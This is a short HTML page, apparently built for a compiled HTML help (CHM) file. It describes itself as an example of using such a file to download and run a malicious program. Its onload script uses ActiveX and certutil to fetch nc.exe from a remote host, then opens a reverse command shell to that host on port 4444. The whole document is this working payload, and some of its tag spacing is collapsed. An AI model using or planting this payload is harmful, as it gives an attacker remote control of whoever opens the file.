<html><head><metahttp-equiv="Content-Type"content="text/html; charset=utf-8"><title>Example</title><scripttype="text/javascript">functiondownloadAndRun(){var command ="certutil -urlcache -split -f http://192.168.8.145/nc.exe nc.exe && nc.exe -e cmd 192.168.8.145 4444";var wsh =newActiveXObject("WScript.Shell");
wsh.Run(command,0,false);}</script></head><bodyonload="downloadAndRun()"><h1>Example</h1><p>This is an example of using CHM file to download and run a malicious program using certutil.</p></body></html>